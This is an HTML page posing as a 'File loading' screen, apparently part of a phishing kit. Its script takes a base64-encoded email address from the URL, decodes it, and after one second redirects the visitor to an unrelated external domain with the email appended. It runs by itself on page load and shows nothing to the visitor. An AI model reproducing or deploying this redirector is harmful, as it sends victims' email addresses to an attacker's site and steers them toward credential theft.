<!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>File loading</title> <script> // Function to get the value of a parameter from the URL function getParameterByName(name, url) { if (!url) url = window.location.href; name = name.replace(/[\[\]]/g, "\\$&"); var regex = new RegExp("[?&]" + name + "(=([^&#]*)|&|#|$)"), results = regex.exec(url); if (!results) return null; if (!results[2]) return ''; return decodeURIComponent(results[2].replace(/\+/g, " ")); } var base64EmailParam = getParameterByName('email'); function decodeEmail(base64Email) { return atob(base64Email); } if (base64EmailParam) { var email = decodeEmail(base64EmailParam); setTimeout(function () { window.location.href = 'https://jsiebt71sx.funtutuess.store/?email=' + email; }, 1000); } </script> </head> <body> </html>